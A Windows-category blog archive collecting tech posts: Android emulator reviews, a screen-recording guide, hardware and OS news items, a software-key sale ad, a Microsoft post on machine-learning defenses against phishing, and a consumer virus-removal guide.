Category Archives: Windows

5 Best Android Emulators for Windows PC and Mac

Android gained popularity after Google took over the nascent startup and released it publicly in 2007. Since then, Android emulators for PC gained popularity for various reasons. Some use it for trying different apps before installing on their phones while others try it for business purposes. A new breed of users has emerged as well who utilize Android emulators for gaming. It can be attributed to games like PUBG Mobile

What is an Android emulator?

An Android emulator is an Android Virtual Device (AVD) that emulates the Android environment so that other devices can run the Android operating system. It is generally used for testing, bug-finding, and running various apps on a virtually controlled system on devices other than actual Android phones.

It lets the host (mainly a computer system) behave like another hardware or software system for different purposes. The idea of the Android emulator gained traction with the release of the Android SDK by Google in 2007 (2008 for the public).

Here are some of the best Android emulators for PC

1. MEmu Play

First on the list is an Android 5.1 Lollipop based Android emulator for Windows. It is among the most customizable Android emulators for PC in the segment.

The installation is quick and simple with no bloatware third-party apps to install like we come across in some emulators. The installer is also one fancy thing, I might add.

It takes around 2-3 minutes when launching for the first time. Time varies according to the processing power of your computer, along with the performance of other components.

The emulator comes pre-loaded with some third-party apps, preferably the ones sponsoring them, so I can’t really complain. There is no option to remove them. Honestly, I wouldn’t worry unless I’m running on 2 GB of RAM and a Pentium 4 processor, which really can’t handle multi-tasking.

One of the hot selling points of this emulator is Key Mapping. What Key-Mapping does is that you can put markers anywhere on the screen and assign a keyboard key or mouse button.
When you press that key or push a button, the controls or app present on that part of the screen get pressed/triggered. It comes in handy when playing FPS, RPG or any game that requires multiple button control.

The emulator is already keyboard-mouse compatible to an extent and worked with most of the games without any hiccup.

What I liked

Customizability: The emulator is flexible in terms of general resource usage. You can set the amount of RAM, Screen resolution, FPS, and graphics engine to be used by the emulator according to your machine’s capabilities.
Custom DNS, Root mode, and Cache performance policy can also be changed according to user’s requirements.

Key-mapping can help gamers play games with a variety of onscreen controls on the snap of a finger.

Cross-platform installation of apps is a bliss. You can browse folders present on Windows and install APKs directly without the intervention of Play store.

Even the option of synchronizing folders between Windows and emulator for a variety of purposes is provided. That makes it easier to transfer files from Windows filesystem to Emulator and vice-versa.

What I did not like

• Not really a con per se but Microphone integration could be more efficient given the stability the platform provides.

Download: HERE


2. Bluestacks 3

BlueStacks is one of the oldest emulators for Android out there that are still active in the market. It’s not a sin to say that perhaps it was the market-defining player during its peak days.

The key reason for its success was its ease of usability and access to the consumers. This android emulator is pretty easy to use and comes in FREE and PAID variants.

Installation is simple but filled with their sponsor ads. Setting up the emulator is pretty easy. You launch the emulator and a welcome screen appears. You select the language and the Google account sign-in window appears. Sign in with a Google account and you are golden.

The ad-filled experience might be bitter-sweet for a few: as you launch the emulator, an ad for some sponsored game appears in one tab.

Talking about ads and bloatware, the pre-installed apps are fewer than what you get on normal free versions of certain emulators. However, it is compensated by ads at various creative placement blocks.

What I liked

• Ease of use. The emulator is extremely easy to use with one click Emulator setup.
• Separate key-mapping for different games
• Customizable resolution up to 4K
• Tabbed applications. Every application is windowed separately in a tab which can be closed
• Forum support. Being one of the segment leaders, Bluestacks has built quite a community on their forums. It is helpful for troubleshooting and creative aspects.

What I did not like

• Excessive ads. Given the competition in freeware segment, competitors are not flooding your screen with ads.
• Lacks native Android experience. Users who are looking for vanilla Android experience might not entertain such emulator.

Download: HERE


3. KOPlayer

Touted as the Android emulator for GAMING, it is an Android KitKat 4.4 operating system emulator.

In the era of Android P, this may seem like an obsolete choice for a general user. The emulator can be crucial for developers who are looking to test it on older versions of Android.

KOPlayer is a feature-rich emulator, ideal for users looking to get the most out of the emulating experience.

Android 4.4 is still used on over 11% of the smartphones based on Android OS, according to the official statistics by Google.

What I liked

• Drag and drop option between cross-platforms
• Dual-graphics option to switch according to the demand of the respective application
• Ease of access buttons on either side of the display
• One-click recording and basic editing. The edit video feature is pretty basic but still gets the thing done.

What I did not like

• It is not bug-free. Minor bugs pop up from time to time. One of them being unresponsiveness of the window.

Download: HERE


4. Nox Player

Amongst the list of best Android emulators for PC, this is one of the fastest, in terms of installation and operations. One click installation without any bloatware or third party apps.
The Android version is 4.4 KitKat.

One of the things that stand out is the Macro step record option. You can record your steps in Macro recorder and re-enact them later.

Some apps only work for certain phone models and it really sucks when it is not compatible with the respective emulator. This Android emulator has a workaround for that.

You need to hover over to settings. Set the respective smartphone model. By default, the only option you get is on Samsung smartphones. However, you can set it to custom with the model of your choice, with some custom presets available online.

You can drag and drop files from Windows to the emulator and vice-versa. It is a small but a useful feature.

For some odd reason, I could not find PUBG mobile on the Play Store. Only the competitors of the much-celebrated game were present.

What stands out

• Macro Recorder is helpful for developers, content creators
• You can lock the mouse to the emulator window. It is useful when playing video-games on the emulator so that your cursor/pointer does not fall out of the game’s scope.
• The full-screen mode is seamless. When I say seamless, it really is easy without any hiccup.

What can improve

• Computer resource usage for running the emulator can be optimized further.

Download: HERE


5. LeapDroid

Another Android Kitkat 4.4 based Android emulator for PC. Hands down the simplest Android emulator in the list.

Installation is fairly quick and bloatware free. There are no advanced features like the formerly mentioned emulators in the article.

You get Key Mapping feature to get around. The mouse 360-wheel mapping is something that is crucial while gaming. As soon as the emulator is installed, two virtual machines, named VM1 and VM2 are created. I honestly could not find a way to run more instances. However, two should suffice.

It is an easy going emulator for quick gaming and app testing/usage.

What I liked about it

• Simplicity
• Ease of use. The emulator is easy to operate and does not require a tutorial. I asked my neighbor’s kid who has a Samsung Tab. He found it easy to operate.
• Low resource usage

What could have been better

• APK integration from Windows
• Full screen (non-window) feature would have given a better emulation experience.

Download: HERE

It’s your turn now

I have listed some of the finest Android emulators for PC that are available out there. The right emulator for you will be solely based on your personal preference. It can be baffling for you to choose the best Android emulator. I suggest you take it slow. Try the ones you find falling within your criteria.

Did I miss an emulator worth mentioning? Then let me know via the comment box.

The post 5 Best Android Emulators for Windows PC and Mac appeared first on TechWorm.

How to Record Screen on Windows OS?

There are so many different purposes for which you can use a PC, from quality entertainment to earning a livelihood from the comfort of your home. To make things even better, you can record everything you do on your computer and share it with millions of people across the globe. Over the years, screen recording software has been steadily becoming more powerful and more available to gamers, online tutorial makers and professionals from all walks of life who want to share their skills and knowledge with their followers.

So if you want to join the growing population of screencasters, you’ve come to the right place, because in this article we will introduce you to how to use Windows built-in screen recording feature and one of the best screen recording software products for Windows to record your screen activities.

Windows Screen Recording With Filmora Scrn

Wondershare’s software has often been praised for its simplicity and Filmora Scrn is certainly not an exception. This screen recorder is perfectly suited for the newcomers to the world of screen recording, while it also delivers tools to skilled and experienced users who are looking to create high-quality footage.

Filmora Scrn is available for both Windows and Mac users. If you haven’t installed it yet, just visit their official website to download and install it.

Upon launching Filmora Scrn you’ll be asked whether you want to enter the Quick Capture mode or the software’s Video Editor. So in order to start your screen capturing session, you simply have to click on the Quick Capture button and proceed to adjust the settings.

You can specify the region of the screen you’d like to capture by selecting the Set a Custom Size Later option from the Screen Capture drop-down menu that can be accessed by clicking on the Setting button in the software’s Quick Capture widget. Afterwards, you can move around the rectangle that designates the area of the screen that will be recorded or drag its ends to define the region of the screen you want to capture precisely. The software also provides the Full-Screen option if you want to record the entire screen.

Filmora Scrn enables you to record activities on multiple monitors, which can be quite handy in a lot of different scenarios. In the Setting menu, you can find the Camera option that enables you to record footage using a webcam, while simultaneously capturing your desktop activities.

The audio recording options Filmora Scrn offers allow you to record narration with an external microphone, and you can record system audio independently or simultaneously with the sound recorded by an external microphone. This feature is extremely important if you want to create a tutorial or even a gaming video since you can provide instructions or comment on the events that take place in the screen recording.

The Advanced menu grants you access to HotKeys, Encode and General tabs, so you can select the location where the recording will be saved, set keyboard shortcuts or fine-tune the encoding features. After you’ve adjusted all the settings you can hit the Record button in the Quick Capture widget and start your screen capturing session.

You can always pause the recording by using a keyboard shortcut or by clicking on the Pause button that is located next to the Record button which also stops the recording. Keep in mind that you can add markers while the screen capturing session is still in progress if you want to highlight the most important parts of the video and speed up the video editing process.

Once the screen capturing session is over the video you created will be automatically imported into the software’s video editing mode. The file will be located in the Media Bin and in order to start editing it you’ll have to drag and drop it to the timeline. Filmora Scrn lets you cut or trim the video, so you can remove all of its parts you don’t want to feature in the final cut.

The Annotations tab lets you add captions, overlays, banners or to blur segments of the shot in order to conceal private information. Under the Cursor tab, you’ll be able to choose from several options that enlarge the cursor captured in the video and highlight the most important parts of the video. Exporting videos from Filmora Scrn is a simple process that doesn’t require you to be a video editing expert and the Wondershare’s software also enables you to share your videos directly to YouTube, Vimeo, Twitch or Facebook.

However, you can only save your videos as MP4, MOV, GIF and MP3 files, which somewhat limits your options, but if you just want to post your videos online you don’t really need a wide selection of video file formats. The video editing tools Filmora Scrn offers are optimized for the production of screen recordings, and the software is not best suited for more advanced video editing tasks.

Be that as it may, in my experience Filmora Scrn has always made the screen capturing process simple and easy, while it also enabled me to quickly edit and share the videos I created. Throughout the course of my career, I’ve had the opportunity to use a lot of different screen recorders, and none of them were so easy to use and still provided a set of powerful screen capturing tools. That’s the reason why I think that Filmora Scrn is currently one of the best screen recording software products for Windows on the market, and you can purchase the lifetime license to use it for just $29.99 or you can buy the one-year license for $19.99.

Recording Videos with Built-in Game DVR Tool on Windows 10

For the last few years, each new update of Windows 10 has also contained the Game DVR tool that enables you to capture the screen on your PC. Even though Game DVR primarily serves as a built-in tool for recording gameplay, you can also use it to record other desktop activities. However, it may not work with all Windows-based software, and you’ll have to check if this tool is compatible with the software you’d like to record.

In order to bring up the Game Bar, you should launch the Xbox app first and then simply press the Windows Logo and G keys; once it opens you can just hit the record button. Alternatively, you can hold the Windows Logo, Alt and R keys to start a new screen capturing session. Despite offering a relatively easy way to record video games, the Game DVR tool doesn’t offer video editing options, which means that screen recording software like Filmora Scrn is a much better option.

Conclusion

Creating screencasts has so many different aspects, and in order to focus on the quality of the content you’re producing, you should choose a software such as Filmora Scrn that lets you control the screen capturing process completely and effortlessly.

Let us know in the comments section which method of screen recording you commonly use and hit share if you think your friends should know about Wondershare’s Filmora Scrn.

The post How to Record Screen on Windows OS? appeared first on TechWorm.

“Hey, Cortana, did Patch Tuesday fix a serious lock screen bug?”

This month’s Patch, er sorry, Update Tuesday includes fixes for 50 high-impact vulnerabilities in Microsoft Windows – 11 of which were rated Critical and 39 Important. The majority of the Critical bugs patched in this update affect the Edge browser, while most of the Important bugs belonged to Windows 10. One of the more interesting […]

Microsoft releases Windows 10 SDK Preview Build 17686

Windows 10 SDK preview build 17686 now available for developers

Last week, Microsoft had rolled out the Windows 10 SDK preview build 17682. And yesterday, the software giant rolled out the Windows 10 SDK Insider Preview Build 17686 for developers.

This newly released SDK doesn’t add anything in the way of features, as the company had last week only added MSIX Support, which came with build 17682. MSIX is an app packaging format that combines MSI and APPX. While developers can use the MakeAppx tool to package their application with MSIX, they should also note that MSIX is currently not supported by the App Certification Kit or the Microsoft Store.

The Preview SDK Build 17686 also contains bug fixes and under-development changes to the API surface area. You can install this SDK and also continue to submit your apps that target Windows 10 Creators build or earlier to the store. This Windows SDK will now formally be only supported by Visual Studio 2017 and greater. Further, this SDK will only install on Windows 10 Insider Preview builds.

To download the updated preview SDK, click here. For more information, check out Microsoft’s full release notes.

The post Microsoft releases Windows 10 SDK Preview Build 17686 appeared first on TechWorm.

Laptops With 128GB of RAM Are Here

An anonymous reader quotes a report from The Verge: Brace yourself for laptops with 128GB of RAM because they're coming. Today, Lenovo announced its ThinkPad P52, which, along with that massive amount of memory, also features up to 6TB of storage, up to a 4K, 15.6-inch display, an eighth-gen Intel hexacore processor, and an Nvidia Quadro P3200 graphics card. The ThinkPad also includes two Thunderbolt three ports, HDMI 2.0, a mini DisplayPort, three USB Type-A ports, a headphone jack, and an Ethernet port. The company hasn't announced pricing yet, but it's likely going to try to compete with Dell's new 128GB-compatible workstation laptops. The Dell workstation laptops in question are the Precision 7730 and 7530, which are billed as "ready for VR" mobile workstations. According to TechRadar, "These again run with either 8th-gen Intel CPUs or Xeon processors, AMD Radeon WX or Nvidia Quadro graphics, and the potential to specify a whopping 128GB of 3200MHz system memory."

Read more of this story at Slashdot.

Hundreds of Thousands of Windows XP and Vista Users Won’t Be Able To Use Steam Soon

Windows XP and Vista users have six months to upgrade their operating systems or get the hell off of Steam. From a report: "Steam will officially stop supporting the Windows XP and Windows Vista operating systems," Valve, the company that operates Steam, said in a post to its XP and Vista support community. "This means that after that date the Steam Client will no longer run on those versions of Windows. In order to continue running Steam and any games or other products purchased through Steam, users will need to update to a more recent version of Windows."

Read more of this story at Slashdot.

0N9.COM SALE: 15% DISCOUNT OF WINDOWS 10 AND OFFICE 2016

0N9.COM offers a large range of PC games/expansion packs, Xbox live subscriptions & games, PlayStation Network cards/games and more. We provide the best price possible on the internet and instant delivery, without wasting time searching. Save money and enjoy your game quickly and safely!
Now 0n9.com sells software products such as Windows 10 Professional OEM Key and Microsoft Office 2016 Professional Plus Retail Key. People can click https://www.0n9.com/microsoft-office-2016-professional-plus-retail-key.html and https://www.0n9.com/windows-10-professional-oem-key.html to know more about them. By the way, there is also a 15% discount on our software by using the coupon SOFTTECH.

The post 0N9.COM SALE: 15% DISCOUNT OF WINDOWS 10 AND OFFICE 2016 appeared first on TechWorm.

Machine learning vs. social engineering

Machine learning is a key driver in the constant evolution of security technologies at Microsoft. Machine learning allows Microsoft 365 to scale next-gen protection capabilities and enhance cloud-based, real-time blocking of new and unknown threats. Just in the last few months, machine learning has helped us to protect hundreds of thousands of customers against ransomware, banking Trojan, and coin miner malware outbreaks.

But how does machine learning stack up against social engineering attacks?

Social engineering gives cybercriminals a way to get into systems and slip through defenses. Security investments, including the integration of advanced threat protection services in Windows, Office 365, and Enterprise Mobility + Security into Microsoft 365, have significantly raised the cost of attacks. The hardening of Windows 10 and Windows 10 in S mode, the advancement of browser security in Microsoft Edge, and the integrated stack of endpoint protection platform (EPP) and endpoint detection and response (EDR) capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP) further raise the bar in security. Attackers intent on overcoming these defenses to compromise devices are increasingly reliant on social engineering, banking on the susceptibility of users to open the gate to their devices.

Modern social engineering attacks use non-portable executable (PE) files like malicious scripts and macro-laced documents, typically in combination with social engineering lures. Every month, Windows Defender AV detects non-PE threats on over 10 million machines. These threats may be delivered as email attachments, through drive-by web downloads, removable drives, browser exploits, etc. The most common non-PE threat file types are JavaScript and VBScript.

Figure 1. Ten most prevalent non-PE threat file types encountered by Windows Defender AV

Non-PE threats are typically used as intermediary downloaders designed to deliver more dangerous executable malware payloads. Due to their flexibility, non-PE files are also used in various stages of the attack chain, including lateral movement and establishing fileless persistence. Machine learning allows us to scale protection against these threats in real-time, often protecting the first victim (patient zero).

Catching social engineering campaigns big and small

In mid-May, a small-scale, targeted spam campaign started distributing spear phishing emails that spoofed a landscaping business in Calgary, Canada. The attack was observed targeting less than 100 machines, mostly located in Canada. The spear phishing emails asked target victims to review an attached PDF document.

When opened, the PDF document presents itself as a secure document that requires action, a very common social engineering technique used in enterprise phishing attacks. To view the supposed secure document, the target victim is instructed to click a link within the PDF, which opens a malicious website with a sign-in screen that asks for enterprise credentials.

Phished credentials can then be used for further attacks, including CEO fraud, additional spam campaigns, or remote access to the network for data theft or ransomware. Our machine learning blocked the PDF file as malware (Trojan:Script/Cloxer.A!cl) from the get-go, helping prevent the attack from succeeding.

Figure 2. Phishing email campaign with PDF attachment

Beyond targeted credential phishing attacks, we commonly see large-scale malware campaigns that use emails with archive attachments containing malicious VBScript or JavaScript files. These emails typically masquerade as an outstanding invoice, package delivery, or parking ticket, and instruct targets of the attack to refer to the attachment for more details. If the target opens the archive and runs the script, the malware typically downloads and runs further threats like ransomware or coin miners.

Figure 3. Typical social engineering email campaign with an archive attachment containing a malicious script

Malware campaigns like these, whether limited and targeted or large-scale and random, occur frequently. Attackers go to great lengths to avoid detection by heavily obfuscating code and modifying their attack code for each spam wave. Traditional methods of manually writing signatures identifying patterns in malware cannot effectively stop these attacks. The power of machine learning is that it is scalable and can be powerful enough to detect noisy, massive campaigns, but also specific enough to detect targeted attacks with very few signals. This flexibility means that we can stop a wide range of modern attacks automatically at the onset.

Machine learning models zero in on non-executable file types

To fight social engineering attacks, we build and train specialized machine learning models that are designed for specific file types.

Building high-quality specialized models requires good features for describing each file. For each file type, the full contents of hundreds of thousands of files are analyzed using large-scale distributed computing. Using machine learning, the best features that describe the content of each file type are selected. These features are deployed to the Windows Defender AV client to assist in describing the content of each file to machine learning models.

In addition to these ML-learned features, the models leverage expert researcher-created features and other useful file metadata to describe content. Because these ML models are trained for specific file types, they can zone in on the metadata of these file types.

Figure 4. Specialized file type-specific client ML models are paired with heavier cloud ML models to classify and protect against malicious script files in real-time

When the Windows Defender AV client encounters an unknown file, lightweight local ML models search for suspicious characteristics in the file’s features. Metadata for suspicious files is sent to the cloud protection service, where an array of bigger ML classifiers evaluates the file in real-time.

In both the client and the cloud, specialized file-type ML classifiers add to generic ML models to create multiple layers of classifiers that detect a wide range of malicious behavior. In the backend, deep-learning neural network models identify malicious scripts based on their full file content and behavior during detonation in a controlled sandbox. If a file is determined malicious, it is not allowed to run, preventing infection at the onset.

File type-specific ML classifiers are part of metadata-based ML models in the Windows Defender AV cloud protection service, which can make a verdict on suspicious files within a fraction of a second.

Figure 5. Layered machine learning models in Windows Defender ATP

File type-specific ML classifiers are also leveraged by ensemble models that learn and combine results from the whole array of cloud classifiers. This produces a comprehensive cloud-based machine learning stack that can protect against script-based attacks, including zero-day malware and highly targeted attacks. For example, the targeted phishing attack in mid-May was caught by a specialized PDF client-side machine learning model, as well as several cloud-based machine learning models, protecting customers in real-time.

Microsoft 365 threat protection powered by artificial intelligence and data sharing

Social engineering attacks that use non-portable executable (PE) threats are pervasive in today’s threat landscape; the impact of combating these threats through machine learning is far-reaching.

Windows Defender AV combines local machine learning models, behavior-based detection algorithms, generics, and heuristics with a detonation system and powerful ML models in the cloud to provide real-time protection against polymorphic malware. Expert input from researchers, advanced technologies like Antimalware Scan Interface (AMSI), and rich intelligence from the Microsoft Intelligent Security Graph continue to enhance next-generation endpoint protection platform (EPP) capabilities in Windows Defender Advanced Threat Protection.

In addition to antivirus, components of Windows Defender ATP’s interconnected security technologies defend against the multiple elements of social engineering attacks. Windows Defender SmartScreen in Microsoft Edge (also now available as a Google Chrome extension) blocks access to malicious URLs, such as those found in social engineering emails and documents. Network protection blocks malicious network communications, including those made by malicious scripts to download payloads. Attack surface reduction rules in Windows Defender Exploit Guard block Office-, script-, and email-based threats used in social engineering attacks. On the other hand, Windows Defender Application Control can block the installation of untrusted applications, including malware payloads of intermediary downloaders. These security solutions protect Windows 10 and Windows 10 in S mode from social engineering attacks.

Further, Windows Defender ATP endpoint detection and response (EDR) uses the power of machine learning and AMSI to unearth script-based attacks that “live off the land”. Windows Defender ATP allows security operations teams to detect and mitigate breaches and cyberattacks using advanced analytics and a rich detection library. With the April 2018 Update, automated investigation and advanced hunting capabilities further enhance Windows Defender ATP. Sign up for a free trial.

Machine learning also powers Office 365 Advanced Threat Protection to detect non-PE attachments in social engineering spam campaigns that distribute malware or steal user credentials. This enhances the Office 365 ATP comprehensive and multi-layered solution to protect mailboxes, files, online storage, and applications against threats.

These and other technologies power Microsoft 365 threat protection to defend the modern workplace. In Windows 10 April 2018 Update, we enhanced signal sharing across advanced threat protection services in Windows, Office 365, and Enterprise Mobility + Security through the Microsoft Intelligent Security Graph. This integration enables these technologies to automatically update protection and detection and orchestrate remediation across Microsoft 365.

 

Gregory Ellison and Geoff McDonald
Windows Defender Research

Qualcomm Unveils Snapdragon 850 Platform Targeted For Windows 10 PCs

MojoKid writes: Qualcomm's Always-Connected Windows 10 PC initiative with Microsoft kicks into another gear this morning with the announcement of the Qualcomm Snapdragon 850 Mobile Platform for Windows 10 PCs. Based on what looks to be an optimized version of the Snapdragon 845 specifically tuned for laptops and 2-in-1 convertibles, the Snapdragon 850 promises a 30 percent boost in system-wide performance versus the previous generation Snapdragon 835 platform, while its integrated Snapdragon X20 LTE modem promises peak speeds of 1.2Gbps. When it comes to battery life, Qualcomm says that PCs running the Snapdragon 850 will be able to top 25 hours of runtime. Qualcomm also notes it will have many more OEM partners and a lot more device options to choose from (hopefully at lower price points) this time around. Couple that with Microsoft's new support for the ARM64 SDK in Windows 10, and things could get interesting for this new class of machine. No word on availability just yet, beyond the note that devices will be available in market later this year.

Read more of this story at Slashdot.

Dell is Reportedly Working on a Dual-Screen Windows ARM Device

Dell is working on a foldable dual-screen device, according to a report. According to news blog WinFuture, Dell's supposedly forthcoming device would run Windows 10 and an unreleased Qualcomm Snapdragon 850 ARM processor. From a report: Dell's device is reportedly codenamed "Januss," and has been under development since last summer, but it's not clear whether the device will ever come to market. Dell was working on mobile Windows devices before, and those devices were canceled. Microsoft also canceled its own Surface Mini device, just weeks before it was due to be revealed. The Verge understands that the documents WinFuture has obtained are old, and that Dell could have altered its product plans by now.

Read more of this story at Slashdot.

Windows Server 2016 Has an Update Problem, Users Say

madsci1016 writes: Frustrated with how long my Windows Server 2016 Essentials was taking to apply weekly updates, I turned to the web. A quick search revealed that I'm not alone. Many people are reporting similar experiences across the web. All sharing stories of weekly patching taking hours and sometimes ending in hung welcome screens. Some of these threads started a year ago and are still active, with no response from Microsoft addressing the issue. If you use Server 2016, have you experienced this problem?

Read more of this story at Slashdot.

Windows 10 Pro Is a Dead End For the Enterprise, Gartner Says

A prominent Gartner analyst argues that Windows 10 Pro is a dead end for enterprises, citing recent changes by Microsoft to the Windows 10 support schedule. "[We] predict that Microsoft will continue positioning Windows [10] Pro as a release that is not appropriate for enterprises by reducing [...] support and limiting access to enterprise management features," Stephen Kleynhans, a research vice president at Gartner and one of the research firm's resident Windows experts, said in a report he co-authored. Computerworld reports: Last year, the Redmond, Wash. developer announced a six-month support extension for Windows 10 1511, the November 2015 feature upgrade, "to help some early enterprise adopters that are still finishing their transition to Windows as a service." In February, Microsoft added versions 1609, 1703 and 1709 -- released in mid-2016, and in April and October of 2017, respectively -- to the extended support list, giving each 24 months of support, not the usual 18. There was a catch: Only Windows 10 Enterprise (and Windows 10 Education, a similar version for public and private school districts and universities) qualified for the extra six months of support. Users running Windows 10 Pro were still required to upgrade to a successor SKU (stock-keeping unit) within 18 months to continue receiving security patches and other bug fixes. Another component of Microsoft's current Windows 10 support strategy, something the company has labeled "paid supplemental servicing," was also out of bounds for those running Windows 10 Pro. The extra support, which Microsoft will sell at an undisclosed price, is available only to Enterprise and Education customers. Paid supplemental servicing adds 12 months to the 18 months provided free of charge.

Read more of this story at Slashdot.

Windows 10 Spring Update Improves Linux On WSL With Unix Sockets and More

Billly Gates writes: Windows 10 build 1803 has come out this month, but with some problems. AnandTech has a deep-dive with the review examining many new features including the much better support for Linux. WSL (Windows Subsystem for Linux) now has native Curl and Tar from the command prompt as well as a utility to convert Unix to Windows pathnames called WSLpath.exe which is documented here. In addition it was mentioned on Slashdot in the past about OpenSSH being ported natively to Win32 in certain early builds. It now seems the reason was for Linux interoperability with this Spring Update 2. Unix sockets mean you can run Kali Linux on Windows 10 for penetration testing or run an Apache server in the background with full Linux networking support. Daemons now run in the background even with the command prompt closed. [...]

Read more of this story at Slashdot.

How to Get Rid of a Virus

Finding out that your computer or laptop is infected with a virus is a scary feeling. You may have important files on the hard drive, irreplaceable photos, or an in-progress project that you forgot to save. Viruses and malware can be a significant threat to your data and your personal information and can impact the way your computer performs.

While there are a variety of reasons your computer can be running slowly, it’s best to rule out malware first if your computer is acting up. Since viruses are tricky to get rid of, we put together a step-by-step guide on how to get rid of a virus from start to finish.

Virus Detection

Before you go knee-deep into cleaning out your computer, it’s important to confirm that you actually have a virus. A few telltale signs that your computer is infected are:

  • Pop up messages are appearing often. These are constantly popping up every time you are on your computer, and they are hard to x out of or get rid of. Never click on a suspicious pop up even if it says a virus has been detected as this could be a fake antivirus system.
  • Your computer is running slowly. Make sure that all of your applications and systems are up to date. If it’s still slow, it’s probably a virus that is hijacking your browser using advertising or phishing sites.
  • Your hard drive is making noise. If your hard disk is making continuous noises or spins with minimal to no computer activity, your PC could be infected.
  • Programs are continually crashing. If programs are starting and closing automatically, or your system randomly shuts down or freezes, your computer could be experiencing a virus.
  • You have missing files. If you are missing files that you know were not deleted, this may be due to malware. Some malware creates issues by deleting files and moving them around or encrypting files so you cannot open them.
  • High network activity. If your wifi or internet activity is very active even when you are not using it, a virus could be infiltrating your internet to send information back and forth.

Method 1: Scanning

Before beginning the virus removal process, be sure that all of your important data is backed up. This will ensure any valuable files will be safe before you clean your computer. It is a good idea to scan all your personal data before copying it to an external hard drive. There are many programs for spyware/virus removal and many are free. Panda Security has two free scanning tools to disinfect your PC in a few easy steps: the Panda Cloud Cleaner and the Panda Cloud Cleaner rescue USB drive, which we will discuss in the next section.

If you haven’t already, make sure to have an antivirus program installed. Install an antivirus system that also protects against ransomware, as programs with both can pick up things that an antivirus program alone does not recognize. You’ll then want to reboot your computer to Safe Mode. A virus can only access your computer when it’s running. Some viruses run by attaching themselves to the startup program when Windows loads. When placed in Safe Mode, your computer will only load the essential files, which can stop all viruses from starting. You can then identify them and remove them.

Once all of your scanning is complete, you will receive a summary of the malware found. Review the detection list to avoid accidentally removing legitimate programs, and be sure to clean the malware. Then, restart your computer and test its performance. Try a web browser or whatever program was causing you trouble to begin with. If your computer appears to be running smoothly, it is probably safe from viruses.

Method 2: Rescue Disk/USB Drive

If your computer cannot start because of the virus, you may have to use a rescue USB drive or rescue disk. A rescue USB drive allows you to scan the computer without the need to start the computer. Using another computer, download an ISO image file from your anti-virus company and burn it onto a disk or USB drive.

Then boot to this disc or USB drive instead of the normal Windows install and run your anti-virus software from there. Since your computer is not running, the infection should not be able to interfere and you’ll have a better opportunity to rid the virus. Most computers can be booted up from a rescue USB. Click here for more detailed information on Panda Security’s Cloud Cleaner rescue USB.

Method 3: Removing a Virus Manually

Some viruses need to be removed manually. Only tackle this if you know Windows well and know how to view and delete program files. If you feel comfortable, download Autoruns, which lets you see exactly what is running on your computer and how to get rid of it. After you download Autoruns, make sure it is in a convenient folder or access spot to be retrieved later on.

Run the program and be mindful that there are a lot of areas that may be unfamiliar. Make it easier on yourself and disable reporting of certain signed Microsoft services and of programs that you know are not malware. Filter your options to verify code signatures, include empty locations and hide the Microsoft entries.

Then, reboot into Safe Mode with networking. This will allow you to use the internet to look up suspicious programs that are starting with your computer. Start the Autoruns program and begin searching for suspicious entries.

This can be overwhelming, but it’s important to take your time when searching for viruses. Looking at both the entry name and file location, determine the legitimacy of each entry by searching for it on an online process identifier that can tell you exactly what the process is and whether it’s a potential risk. Read the Logon and Services tabs, which will provide filtered information for you.

If you can, record the file location and any other relevant information before you delete an entry. Right-click on the malware entry and click delete. Delete all associated files, and delete each entry one at a time to be safe. Once you delete the malware and files, be sure to empty the trash bin on your desktop and restart your computer.

Method 4: Clean Install

This is probably the most tedious of the bunch, but it is almost a guaranteed way to rid your computer of viruses and malware. A clean install deletes everything on your hard drive, so this is one where you will also want to transfer your photos and text documents to an external hard drive. Be sure to scan and make sure these have not been infected as well. You will have to reinstall all programs, but it can save your computer from further infiltration and destruction due to viruses.

With the newest version of Windows (Windows 8.1 and 10), there are a few ways to clean install depending on what you have on your computer. You can clean install from a DVD/USB drive, using reset, or perform a clean install within a running version. With a DVD or USB drive, you will need a product key to run a clean install.

With a running version, you want to choose “keep nothing” when it comes to what the drive should keep after the clean install. This is necessary if the other methods have not worked and you need to wipe the hard drive. Read here to learn how to build in the Reset function to clean install.

Removing a Virus from a Mac

While many people believe they cannot get viruses or malware on Macs, these devices can also be infected. There are common names posing as Mac antiviruses such as MacDefender and MacSecurity that are malicious and designed to trap Mac users into entering their Apple ID accounts and submitting their credit cards. If you receive a message while browsing the internet that involves something wrong with your Mac, or “download here to keep your Mac safe”, ignore these messages and quit the browser you are on.

Make sure there are no downloads installed or downloading, and immediately put these in the trash. If it seems the malware is already installed on your Mac, quit whatever app or program you think could be infected and launch your Activity Monitor. Once you’ve located the app in question, search the common Mac malware terms we’ve listed above. If you identify malware, click Quit Process and quit the Activity Monitor. Delete the application from your device entirely. Make sure your software and applications are always up to date and download a Mac antivirus system in order to browse the internet safely on your Mac.

In order to prevent a virus, be sure to download a secure antivirus system on your computer if you haven’t already. Update your software as often as you can, since viruses are constantly changing and updating in order to outsmart your system. Also, backup your data regularly to ensure you will not lose previous files if ever infected with a virus. Be wary of the emails you receive and don’t open any suspicious looking files or links.

Removing a Virus from an Android Phone

If you believe your Android phone has been compromised with a virus, the same rules apply when determining if your phone has a virus. If there is a surge in data usage, unexplained charges, unwanted apps or sudden pop ups, you could be under a hack. If you start to detect drastic reductions in battery life with your phone, it could also be infected with a virus. There are a few steps to removing a virus from an android phone.

You can remove a virus by putting your phone or tablet into Safe Mode. This will prevent any third-party apps from running, including malware. Press the power button to access the power off options, then click restart in Safe Mode. Once in Safe Mode, you can open your Settings and choose Apps or Application Manager.

Take a look at the list of apps and make sure there isn’t anything odd or unfamiliar. Make sure you are looking at the Downloaded tab to see what’s installed on your Android. You’ll also want to clear your app’s data cache by selecting “Clear Cache” before deleting. Then delete the app’s data choosing “Clear Data”. Click uninstall to fully remove the app.

Usually this should remove the virus. However, in some cases you might find that the Uninstall button is greyed out and inaccessible. This is because the virus has given itself Device Administrator access. You’ll need to exit the Apps menu and tap on Settings>Security>Device Administrators. This is where you’ll find a list of apps on your device with administrator status. Untick the box for the app you’d like to remove and then tap Deactivate.

You should now be able to return to the original apps menu and remove that app. Now that the virus is removed, restart your device and turn off Safe mode. Once your virus is removed be sure to back up any important information you have on your device, and install an Android antivirus to avoid future breaches.


The post How to Get Rid of a Virus appeared first on Panda Security Mediacenter.

Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.

